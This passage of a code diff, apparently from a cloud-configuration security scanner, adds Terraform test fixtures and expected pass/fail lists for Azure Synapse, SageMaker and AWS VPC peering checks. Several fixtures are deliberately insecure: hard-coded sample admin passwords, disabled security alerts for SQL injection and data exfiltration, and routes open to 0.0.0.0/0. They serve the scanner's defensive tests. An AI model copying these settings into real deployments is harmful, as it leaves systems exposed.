+  name = "example_role_restricted"
+  policy = jsonencode({
+    Version = "2012-10-17"
+    Statement = [
+      {
+        Effect = "Allow"
+        Action = "s3:ListBucket"
+        Resource = "arn:aws:s3:::example-bucket"
+      }
+    ]
+  })
+  assume_role_policy = ""
+}
+
+resource "aws_sagemaker_notebook_instance" "pass1" {
+  name   = "example-notebook-instance-restricted"
+  role_arn = aws_iam_role.example_role_restricted.arn
+  instance_type = ""
+}
+
+resource "aws_iam_role" "example_role_no_policy" {
+  name = "example_role_no_policy"
+  assume_role_policy = ""
+}
+
+resource "aws_sagemaker_notebook_instance" "pass2" {
+  name   = "example-notebook-instance-no-policy"
+  role_arn = aws_iam_role.example_role_no_policy.arn
+  instance_type = ""
+}
diff --git a/tests/terraform/graph/checks/resources/SynapseLogMonitoringEnabledForSQLPool/expected.yaml b/tests/terraform/graph/checks/resources/SynapseLogMonitoringEnabledForSQLPool/expected.yaml
new file mode 100644
index 00000000000..1e2f6c8fd7d
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SynapseLogMonitoringEnabledForSQLPool/expected.yaml
@@ -0,0 +1,6 @@
+pass:
+  - "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_pass_A"
+  - "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_pass_B"
+fail:
+  - "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_fail_A"
+  - "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_fail_B"
\ No newline at end of file
diff --git a/tests/terraform/graph/checks/resources/SynapseLogMonitoringEnabledForSQLPool/main.tf b/tests/terraform/graph/checks/resources/SynapseLogMonitoringEnabledForSQLPool/main.tf
new file mode 100644
index 00000000000..6675049cd8a
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SynapseLogMonitoringEnabledForSQLPool/main.tf
@@ -0,0 +1,82 @@
+resource "azurerm_resource_group" "example" {
+  name     = "example-resources"
+  location = "West Europe"
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_example" {
+  name                                 = "example"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+  sql_administrator_login_password     = "H@Sh1CoR3!"
+
+  aad_admin {
+    login     = "AzureAD Admin"
+    object_id = "00000000-0000-0000-0000-000000000000"
+    tenant_id = "00000000-0000-0000-0000-000000000000"
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+
+  tags = {
+    Env = "production"
+  }
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_pass_A" {
+  name                 = "examplesqlpool"
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_pass_B" {
+  name                 = "examplesqlpool"
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_fail_A" {
+  name                 = "examplesqlpool"
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_fail_B" {
+  name                 = "examplesqlpool"
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+}
+
+
+resource "azurerm_synapse_sql_pool_extended_auditing_policy" "extended_auditing_policy_enabled" {
+  sql_pool_id                             = azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_pass_A.id
+  log_monitoring_enabled                  = true
+  storage_endpoint                        = azurerm_storage_account.audit_logs.primary_blob_endpoint
+  storage_account_access_key              = azurerm_storage_account.audit_logs.primary_access_key
+  storage_account_access_key_is_secondary = false
+  retention_in_days                       = 6
+}
+
+resource "azurerm_synapse_sql_pool_extended_auditing_policy" "extended_auditing_policy_enabled_by_default" {
+  sql_pool_id                             = azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_pass_B.id
+  storage_endpoint                        = azurerm_storage_account.audit_logs.primary_blob_endpoint
+  storage_account_access_key              = azurerm_storage_account.audit_logs.primary_access_key
+  storage_account_access_key_is_secondary = false
+  retention_in_days                       = 6
+}
+
+resource "azurerm_synapse_sql_pool_extended_auditing_policy" "extended_auditing_policy_disabled" {
+  sql_pool_id                             = azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_fail_B.id
+  log_monitoring_enabled                  = false
+  storage_endpoint                        = azurerm_storage_account.audit_logs.primary_blob_endpoint
+  storage_account_access_key              = azurerm_storage_account.audit_logs.primary_access_key
+  storage_account_access_key_is_secondary = false
+  retention_in_days                       = 6
+}
diff --git a/tests/terraform/graph/checks/resources/SynapseSQLPoolHasSecurityAlertPolicy/expected.yaml b/tests/terraform/graph/checks/resources/SynapseSQLPoolHasSecurityAlertPolicy/expected.yaml
new file mode 100644
index 00000000000..54a0f8cff6f
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SynapseSQLPoolHasSecurityAlertPolicy/expected.yaml
@@ -0,0 +1,5 @@
+pass:
+  - "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_pass"
+fail:
+  - "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_fail_A"
+  - "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_fail_B"
\ No newline at end of file
diff --git a/tests/terraform/graph/checks/resources/SynapseSQLPoolHasSecurityAlertPolicy/main.tf b/tests/terraform/graph/checks/resources/SynapseSQLPoolHasSecurityAlertPolicy/main.tf
new file mode 100644
index 00000000000..095d976017a
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SynapseSQLPoolHasSecurityAlertPolicy/main.tf
@@ -0,0 +1,80 @@
+resource "azurerm_resource_group" "example" {
+  name     = "example-resources"
+  location = "West Europe"
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_example" {
+  name                                 = "example"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+  sql_administrator_login_password     = "H@Sh1CoR3!"
+
+  aad_admin {
+    login     = "AzureAD Admin"
+    object_id = "00000000-0000-0000-0000-000000000000"
+    tenant_id = "00000000-0000-0000-0000-000000000000"
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+
+  tags = {
+    Env = "production"
+  }
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_pass" {
+  name                 = "examplesqlpool"
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_fail_A" {
+  name                 = "examplesqlpool"
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_fail_B" {
+  name                 = "examplesqlpool"
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+}
+
+resource "azurerm_storage_account" "audit_logs" {
+  name                     = "examplesa"
+  resource_group_name      = azurerm_resource_group.example.name
+  location                 = azurerm_resource_group.example.location
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+}
+
+resource "azurerm_synapse_sql_pool_security_alert_policy" "azurerm_synapse_sql_pool_security_alert_policy_enabled" {
+  sql_pool_id                = azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_pass.id
+  policy_state               = "Enabled"
+  storage_endpoint           = azurerm_storage_account.audit_logs.primary_blob_endpoint
+  storage_account_access_key = azurerm_storage_account.audit_logs.primary_access_key
+  disabled_alerts = [
+    "Sql_Injection",
+    "Data_Exfiltration"
+  ]
+  retention_days = 20
+}
+
+resource "azurerm_synapse_sql_pool_security_alert_policy" "azurerm_synapse_sql_pool_security_alert_policy_disabled" {
+  sql_pool_id                = azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_fail_B.id
+  policy_state               = "Disabled"
+  storage_endpoint           = azurerm_storage_account.audit_logs.primary_blob_endpoint
+  storage_account_access_key = azurerm_storage_account.audit_logs.primary_access_key
+  disabled_alerts = [
+    "Sql_Injection",
+    "Data_Exfiltration"
+  ]
+  retention_days = 20
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/checks/resources/SynapseSQLPoolHasVulnerabilityAssessment/expected.yaml b/tests/terraform/graph/checks/resources/SynapseSQLPoolHasVulnerabilityAssessment/expected.yaml
new file mode 100644
index 00000000000..c48e1468375
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SynapseSQLPoolHasVulnerabilityAssessment/expected.yaml
@@ -0,0 +1,5 @@
+pass:
+  - "azurerm_synapse_sql_pool_security_alert_policy.azurerm_synapse_sql_pool_security_alert_policy_pass"
+fail:
+  - "azurerm_synapse_sql_pool_security_alert_policy.azurerm_synapse_sql_pool_security_alert_policy_fail_A"
+  - "azurerm_synapse_sql_pool_security_alert_policy.azurerm_synapse_sql_pool_security_alert_policy_fail_B"
\ No newline at end of file
diff --git a/tests/terraform/graph/checks/resources/SynapseSQLPoolHasVulnerabilityAssessment/main.tf b/tests/terraform/graph/checks/resources/SynapseSQLPoolHasVulnerabilityAssessment/main.tf
new file mode 100644
index 00000000000..5ec321e526a
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SynapseSQLPoolHasVulnerabilityAssessment/main.tf
@@ -0,0 +1,109 @@
+resource "azurerm_resource_group" "example" {
+  name     = "example-resources"
+  location = "West Europe"
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_example" {
+  name                                 = "example"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+  sql_administrator_login_password     = "H@Sh1CoR3!"
+
+  aad_admin {
+    login     = "AzureAD Admin"
+    object_id = "00000000-0000-0000-0000-000000000000"
+    tenant_id = "00000000-0000-0000-0000-000000000000"
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+
+  tags = {
+    Env = "production"
+  }
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_example" {
+  name                 = "examplesqlpool"
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+}
+
+
+resource "azurerm_storage_account" "audit_logs" {
+  name                     = "examplesa"
+  resource_group_name      = azurerm_resource_group.example.name
+  location                 = azurerm_resource_group.example.location
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+}
+
+resource "azurerm_synapse_sql_pool_security_alert_policy" "azurerm_synapse_sql_pool_security_alert_policy_pass" {
+  sql_pool_id                = azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_example.id
+  policy_state               = "Enabled"
+  storage_endpoint           = azurerm_storage_account.audit_logs.primary_blob_endpoint
+  storage_account_access_key = azurerm_storage_account.audit_logs.primary_access_key
+  disabled_alerts = [
+    "Sql_Injection",
+    "Data_Exfiltration"
+  ]
+  retention_days = 20
+}
+
+resource "azurerm_synapse_sql_pool_security_alert_policy" "azurerm_synapse_sql_pool_security_alert_policy_fail_A" {
+  sql_pool_id                = azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_example.id
+  policy_state               = "Enabled"
+  storage_endpoint           = azurerm_storage_account.audit_logs.primary_blob_endpoint
+  storage_account_access_key = azurerm_storage_account.audit_logs.primary_access_key
+  disabled_alerts = [
+    "Sql_Injection",
+    "Data_Exfiltration"
+  ]
+  retention_days = 20
+}
+
+resource "azurerm_synapse_sql_pool_security_alert_policy" "azurerm_synapse_sql_pool_security_alert_policy_fail_B" {
+  sql_pool_id                = azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_example.id
+  policy_state               = "Enabled"
+  storage_endpoint           = azurerm_storage_account.audit_logs.primary_blob_endpoint
+  storage_account_access_key = azurerm_storage_account.audit_logs.primary_access_key
+  disabled_alerts = [
+    "Sql_Injection",
+    "Data_Exfiltration"
+  ]
+  retention_days = 20
+}
+
+resource "azurerm_synapse_sql_pool_vulnerability_assessment" "azurerm_synapse_sql_pool_vulnerability_assessment_enabled" {
+  sql_pool_security_alert_policy_id = azurerm_synapse_sql_pool_security_alert_policy.azurerm_synapse_sql_pool_security_alert_policy_pass.id
+  storage_container_path            = "${azurerm_storage_account.example.primary_blob_endpoint}${azurerm_storage_container.example.name}/"
+  storage_account_access_key        = azurerm_storage_account.example.primary_access_key
+
+  recurring_scans {
+    enabled                           = true
+    email_subscription_admins_enabled = true
+    emails = [
+      "email@example1.com",
+      "email@example2.com"
+    ]
+  }
+}
+
+resource "azurerm_synapse_sql_pool_vulnerability_assessment" "azurerm_synapse_sql_pool_vulnerability_assessment_disabled" {
+  sql_pool_security_alert_policy_id = azurerm_synapse_sql_pool_security_alert_policy.azurerm_synapse_sql_pool_security_alert_policy_fail_B.id
+  storage_container_path            = "${azurerm_storage_account.example.primary_blob_endpoint}${azurerm_storage_container.example.name}/"
+  storage_account_access_key        = azurerm_storage_account.example.primary_access_key
+
+  recurring_scans {
+    enabled                           = false
+    email_subscription_admins_enabled = true
+    emails = [
+      "email@example1.com",
+      "email@example2.com"
+    ]
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/checks/resources/SynapseWorkspaceHasExtendedAuditLogs/expected.yaml b/tests/terraform/graph/checks/resources/SynapseWorkspaceHasExtendedAuditLogs/expected.yaml
new file mode 100644
index 00000000000..a65eaf74c56
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SynapseWorkspaceHasExtendedAuditLogs/expected.yaml
@@ -0,0 +1,4 @@
+pass:
+  - "azurerm_synapse_workspace.azurerm_synapse_workspace_pass"
+fail:
+  - "azurerm_synapse_workspace.azurerm_synapse_workspace_fail"
diff --git a/tests/terraform/graph/checks/resources/SynapseWorkspaceHasExtendedAuditLogs/main.tf b/tests/terraform/graph/checks/resources/SynapseWorkspaceHasExtendedAuditLogs/main.tf
new file mode 100644
index 00000000000..a51d65812c1
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SynapseWorkspaceHasExtendedAuditLogs/main.tf
@@ -0,0 +1,66 @@
+resource "azurerm_resource_group" "example" {
+  name     = "example-resources"
+  location = "West Europe"
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_pass" {
+  name                                 = "example"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+  sql_administrator_login_password     = "H@Sh1CoR3!"
+
+  aad_admin {
+    login     = "AzureAD Admin"
+    object_id = "00000000-0000-0000-0000-000000000000"
+    tenant_id = "00000000-0000-0000-0000-000000000000"
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+
+  tags = {
+    Env = "production"
+  }
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_fail" {
+  name                                 = "example"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+  sql_administrator_login_password     = "H@Sh1CoR3!"
+
+  aad_admin {
+    login     = "AzureAD Admin"
+    object_id = "00000000-0000-0000-0000-000000000000"
+    tenant_id = "00000000-0000-0000-0000-000000000000"
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+
+  tags = {
+    Env = "production"
+  }
+}
+
+resource "azurerm_storage_account" "audit_logs" {
+  name                     = "examplesa"
+  resource_group_name      = azurerm_resource_group.example.name
+  location                 = azurerm_resource_group.example.location
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+}
+
+resource "azurerm_synapse_workspace_extended_auditing_policy" "auditing_policy_example" {
+  synapse_workspace_id                    = azurerm_synapse_workspace.azurerm_synapse_workspace_pass.id
+  storage_endpoint                        = azurerm_storage_account.audit_logs.primary_blob_endpoint
+  storage_account_access_key              = azurerm_storage_account.audit_logs.primary_access_key
+  storage_account_access_key_is_secondary = false
+  retention_in_days                       = 6
+}
diff --git a/tests/terraform/graph/checks/resources/VPCPeeringRouteTableOverlyPermissive/expected.yaml b/tests/terraform/graph/checks/resources/VPCPeeringRouteTableOverlyPermissive/expected.yaml
index e494cd405dc..f8b90d0e354 100644
--- a/tests/terraform/graph/checks/resources/VPCPeeringRouteTableOverlyPermissive/expected.yaml
+++ b/tests/terraform/graph/checks/resources/VPCPeeringRouteTableOverlyPermissive/expected.yaml
@@ -2,15 +2,13 @@ pass:
   - "aws_route.aws_route_pass_1"
   - "aws_route.aws_route_pass_2"
   - "aws_route.aws_route_pass_3"
+  - "aws_route.aws_route_pass_4"
+  - "aws_route.aws_route_pass_5"
   - "aws_route_table.aws_route_table_pass_1"
   - "aws_route_table.aws_route_table_pass_2"
   - "aws_route_table.aws_route_table_pass_3"
 fail:
   - "aws_route.aws_route_fail_1"
   - "aws_route.aws_route_fail_2"
-  - "aws_route.aws_route_fail_3"
-  - "aws_route.aws_route_fail_4"
   - "aws_route_table.aws_route_table_fail_1"
   - "aws_route_table.aws_route_table_fail_2"
-  - "aws_route_table.aws_route_table_fail_3"
-  - "aws_route_table.aws_route_table_fail_4"
diff --git a/tests/terraform/graph/checks/resources/VPCPeeringRouteTableOverlyPermissive/main.tf b/tests/terraform/graph/checks/resources/VPCPeeringRouteTableOverlyPermissive/main.tf
index 8ae9b41843f..a4e45826538 100644
--- a/tests/terraform/graph/checks/resources/VPCPeeringRouteTableOverlyPermissive/main.tf
+++ b/tests/terraform/graph/checks/resources/VPCPeeringRouteTableOverlyPermissive/main.tf
@@ -17,24 +17,12 @@ resource "aws_route" "aws_route_pass_3" {
 }
 
 resource "aws_route" "aws_route_fail_1" {
-  route_table_id            = "rtb-4fbb3ac4"
-  destination_cidr_block    = "0.0.0.0"
-  vpc_peering_connection_id = "pcx-45ff3dc1"
-}
-
-resource "aws_route" "aws_route_fail_2" {
   route_table_id            = "rtb-4fbb3ac4"
   destination_cidr_block    = "0.0.0.0/0"
   vpc_peering_connection_id = "pcx-45ff3dc1"
 }
 
-resource "aws_route" "aws_route_fail_3" {
-  route_table_id            = "rtb-4fbb3ac4"
-  destination_ipv6_cidr_block = "::0"
-  vpc_peering_connection_id = "pcx-45ff3dc1"
-}
-
-resource "aws_route" "aws_route_fail_4" {
+resource "aws_route" "aws_route_fail_2" {
   route_table_id            = "rtb-4fbb3ac4"
   destination_ipv6_cidr_block = "::/0"
   vpc_peering_connection_id = "pcx-45ff3dc1"
@@ -81,25 +69,19 @@ resource "aws_route_table" "aws_route_table_fail_2" {
   vpc_id = aws_vpc.example.id
 
   route {
-    cidr_block = "0.0.0.0"
+    ipv6_cidr_block = "::/0"
     vpc_peering_connection_id = "pcx-45ff3dc1"
   }
 }
 
-resource "aws_route_table" "aws_route_table_fail_3" {
-  vpc_id = aws_vpc.example.id
-
-  route {
-    ipv6_cidr_block = "::0"
-    vpc_peering_connection_id = "pcx-45ff3dc1"
-  }
+resource "aws_route" "aws_route_pass_4" {
+  route_table_id            = aws_route_table.rtb1.id
+  destination_cidr_block    = "10.1.0.0/16"
+  vpc_peering_connection_id = "pcx-578451154151544"
 }
 
-resource "aws_route_table" "aws_route_table_fail_4" {
-  vpc_id = aws_vpc.example.id
-
-  route {
-    ipv6_cidr_block = "::/0"
-    vpc_peering_connection_id = "pcx-45ff3dc1"
-  }
+resource "aws_route" "aws_route_pass_5" {
+  route_table_id            = aws_route_table.rtb2.id
+  destination_cidr_block    = "10.0.0.0/16"
+  vpc_peering_connection_id = "pcx-578451154151544"
 }
\ No newline at end of file
diff --git a/tests/terraform/graph/checks/test_yaml_policies.py b/tests/terraform/graph/checks/test_yaml_policies.py
index c929f09078a..c628a60cd00 100644
--- a/tests/terraform/graph/checks/test_yaml_policies.py
+++ b/tests/terraform/graph/checks/test_yaml_policies.py
@@ -22,6 +22,9 @@ def setUp(self) -> None:
         warnings.filterwarnings("ignore", category=ResourceWarning)
         warnings.filterwarnings("ignore", category=DeprecationWarning)
 
+    def test_DatabricksWorkspaceDBFSRootCustomerManagedKey(self):
+        self.go("DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey")
+
     def test_KmsKeyPolicyIsDefined(self):
         self.go("KmsKeyPolicyIsDefined")
 
@@ -50,7 +53,7 @@ def test_S3NotAllowAccessToAllAuthenticatedUsers(self):
         self.go("S3NotAllowAccessToAllAuthenticatedUsers")
 
     def test_CloudFrontHasCustomSSLCertificate(self):
-        self.go("CloudFrontHasCustomSSLCertificate")            
+        self.go("CloudFrontHasCustomSSLCertificate")
 
     def test_CodecommitApprovalRulesAttached(self):
         self.go("CodecommitApprovalRulesAttached")
@@ -65,7 +68,7 @@ def test_APIGatewayEndpointsUsesCertificateForAuthentication(self):
         self.go("APIGatewayEndpointsUsesCertificateForAuthentication")
 
     def test_APIGatewayRequestParameterValidationEnabled(self):
-        self.go("APIGatewayRequestParameterValidationEnabled")        
+        self.go("APIGatewayRequestParameterValidationEnabled")
 
     def test_CloudFrontUsesSecureProtocolsForHTTPS(self):
         self.go("CloudFrontUsesSecureProtocolsForHTTPS")
@@ -74,7 +77,7 @@ def test_EMRClusterHasSecurityConfiguration(self):
         self.go("EMRClusterHasSecurityConfiguration")
 
     def test_OpenSearchDomainHasFineGrainedControl(self):
-        self.go("OpenSearchDomainHasFineGrainedControl")        
+        self.go("OpenSearchDomainHasFineGrainedControl")
 
     def test_VPCHasRestrictedSG(self):
         self.go("VPCHasRestrictedSG")
@@ -89,7 +92,7 @@ def test_SGAttachedToResource(self):
         self.go("SGAttachedToResource")
 
     def test_EC2InstanceHasIAMRoleAttached(self):
-        self.go("EC2InstanceHasIAMRoleAttached") 
+        self.go("EC2InstanceHasIAMRoleAttached")
 
     def test_StorageContainerActivityLogsNotPublic(self):
         self.go("StorageContainerActivityLogsNotPublic")
@@ -116,7 +119,7 @@ def test_DMSEndpointHaveSSLConfigured(self):
         self.go("DMSEndpointHaveSSLConfigured")
 
     def test_ElastiCacheRedisConfiguredAutomaticFailOver(self):
-        self.go("ElastiCacheRedisConfiguredAutomaticFailOver")  
+        self.go("ElastiCacheRedisConfiguredAutomaticFailOver")
 
     def test_VAconfiguredToSendReportsToAdmins(self):
         self.go("VAconfiguredToSendReportsToAdmins")
@@ -156,7 +159,7 @@ def test_GCPDocumentAIWarehouseLocationEncryptedWithCMK(self):
 
     def test_GCPVertexInstanceEncryptedWithCMK(self):
         self.go("GCPVertexInstanceEncryptedWithCMK")
-    
+
     def test_GCPVertexAIEndpointEncryptedWithCMK(self):
         self.go("GCPVertexAIEndpointEncryptedWithCMK")
 
@@ -171,9 +174,9 @@ def test_GCPVertexWorkbenchInstanceEncryptedWithCMK(self):
 
     def test_GCPVertexWorkbenchInstanceNoPublicIp(self):
         self.go("GCPVertexWorkbenchInstanceNoPublicIp")
-        
+
     def test_GCRContainerVulnerabilityScanningEnabled(self):
-        self.go("GCRContainerVulnerabilityScanningEnabled")    
+        self.go("GCRContainerVulnerabilityScanningEnabled")
 
     def test_AzureDataFactoriesEncryptedWithCustomerManagedKey(self):
         self.go("AzureDataFactoriesEncryptedWithCustomerManagedKey")
@@ -194,7 +197,7 @@ def test_GCPLogBucketsConfiguredUsingLock(self):
         self.go("GCPLogBucketsConfiguredUsingLock")
 
     def test_CloudFunctionSecureHTTPTrigger(self):
-        self.go("CloudFunctionSecureHTTPTrigger")    
+        self.go("CloudFunctionSecureHTTPTrigger")
 
     def test_GCPAuditLogsConfiguredForAllServicesAndUsers(self):
         self.go("GCPAuditLogsConfiguredForAllServicesAndUsers")
@@ -247,6 +250,18 @@ def test_StorageLoggingIsEnabledForBlobService(self):
     def test_StorageLoggingIsEnabledForTableService(self):
         self.go("StorageLoggingIsEnabledForTableService")
 
+    def test_SynapseLogMonitoringEnabledForSQLPool(self):
+        self.go("SynapseLogMonitoringEnabledForSQLPool")
+        
+    def test_SynapseSQLPoolHasSecurityAlertPolicy(self):
+        self.go("SynapseSQLPoolHasSecurityAlertPolicy")
+
+    def test_SynapseSQLPoolHasVulnerabilityAssessment(self):
+        self.go("SynapseSQLPoolHasVulnerabilityAssessment")
+
+    def test_SynapseWorkspaceHasExtendedAuditLogs(self):
+        self.go("SynapseWorkspaceHasExtendedAuditLogs")
+
     def test_VMHasBackUpMachine(self):
         self.go("VMHasBackUpMachine")
 
@@ -324,10 +339,10 @@ def test_GCPKMSKeyRingsAreNotPubliclyAccessible(self):
 
     def test_GCPContainerRegistryReposAreNotPubliclyAccessible(self):
         self.go("GCPContainerRegistryReposAreNotPubliclyAccessible")
-    
+
     def test_GCPDialogFlowAgentLoggingEnabled(self):
         self.go("GCPDialogFlowAgentLoggingEnabled")
-    
+
     def test_GCPDialogFlowCxAgentLoggingEnabled(self):
         self.go("GCPDialogFlowCxAgentLoggingEnabled")
 
@@ -336,13 +351,13 @@ def test_GCPDialogFlowCxWebhookLoggingEnabled(self):
 
     def test_GCPVertexAIPrivateEndpoint(self):
         self.go("GCPVertexAIPrivateEndpoint")
-    
+
     def test_GCPVertexAIPrivateIndexEndpoint(self):
         self.go("GCPVertexAIPrivateIndexEndpoint")
 
     def test_GCPTpuV2VmPrivateEndpoint(self):
         self.go("GCPTpuV2VmPrivateEndpoint")
-    
+
     def test_GCPVertexRuntimePrivate(self):
         self.go("GCPVertexRuntimePrivate")
 
@@ -411,7 +426,7 @@ def test_GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled(self):
 
     def test_GCPdisableAlphaClusterFeatureInKubernetesEngineClusters(self):
         self.go("GCPdisableAlphaClusterFeatureInKubernetesEngineClusters")
-        
+
     def test_AzureContainerInstanceconfigManagedIdentity(self):
             self.go("AzureContainerInstanceconfigManagedIdentity")
 
@@ -429,7 +444,7 @@ def test_AzureKeyVaultConfigPrivateEndpoint(self):
 
     def test_AzureStorageAccConfigWithPrivateEndpoint(self):
         self.go("AzureStorageAccConfigWithPrivateEndpoint")
-    
+
     def test_OCI_K8EngineClusterBootVolConfigInTransitEncryption(self):
             self.go("OCI_K8EngineClusterBootVolConfigInTransitEncryption")
 
@@ -456,6 +471,12 @@ def test_AzureAutomationAccConfigManagedIdentity(self):
 
     def test_AzureMariaDBserverUsingTLS_1_2(self):
             self.go("AzureMariaDBserverUsingTLS_1_2")
+   
+    def test_AzureMLWorkspaceWithPublicStorageAccount(self):
+            self.go("AzureMLWorkspaceHBIPublicNetwork")
+
+    def test_AzureMLWorkspacePublicNetwork(self):
+            self.go("AzureMLWorkspacePublicNetwork")
 
     def test_AzureStorageAccountEnableSoftDelete(self):
             self.go("AzureStorageAccountEnableSoftDelete")
@@ -496,6 +517,9 @@ def test_IBM_AppLBforVPCisPrivate(self):
     def test_IBM_VPCclassicAccessIsDisabled(self):
         self.go("IBM_VPCclassicAccessIsDisabled")
 
+    def test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic(self):
+        self.go("SageMakerIAMPolicyOverlyPermissiveToAllTraffic")
+
     def test_IBM_RestrictServiceIDCreationInAccountSettings(self):
         self.go("IBM_RestrictServiceIDCreationInAccountSettings")
 
@@ -505,9 +529,6 @@ def test_IBM_EnableMFAatAccountLevel(self):
     def test_IBM_RestrictAPIkeyCreationInAccountSettings(self):
         self.go("IBM_RestrictAPIkeyCreationInAccountSettings")
 
-    def test_IBM_DatabasesNWaccessRestrictedToSpecificIPrange(self):
-        self.go("IBM_DatabasesNWaccessRestrictedToSpecificIPrange")
-
     def test_IBM_K8sClustersAccessibleViaPrivateEndPt(self):
         self.go("IBM_K8sClustersAccessibleViaPrivateEndPt")
 
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/JsonPathRangeIncludesList.yaml b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/JsonPathRangeIncludesList.yaml
new file mode 100644
index 00000000000..8471d1fd32e
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/JsonPathRangeIncludesList.yaml
@@ -0,0 +1,18 @@
+metadata:
+  name: "example"
+  category: "GENERAL_SECURITY"
+  id: "JsonPathRangeIncludesList"
+scope:
+  provider: "AWS"
+definition:
+  cond_type: "attribute"
+  resource_types:
+    - "test"
+  attribute: "range"
+  operator: "jsonpath_range_includes"
+  value:
+    - "400"
+    - 3000
+    - 100
+    - "1"
+
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/RangeIncludesList.yaml b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/RangeIncludesList.yaml
new file mode 100644
index 00000000000..2e1f66faa3b
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/RangeIncludesList.yaml
@@ -0,0 +1,18 @@
+metadata:
+  name: "example"
+  category: "GENERAL_SECURITY"
+  id: "RangeIncludesList"
+scope:
+  provider: "AWS"
+definition:
+  cond_type: "attribute"
+  resource_types:
+    - "test"
+  attribute: "range"
+  operator: "range_includes"
+  value:
+    - 200
+    - 3000
+    - 400
+    - "500"
+
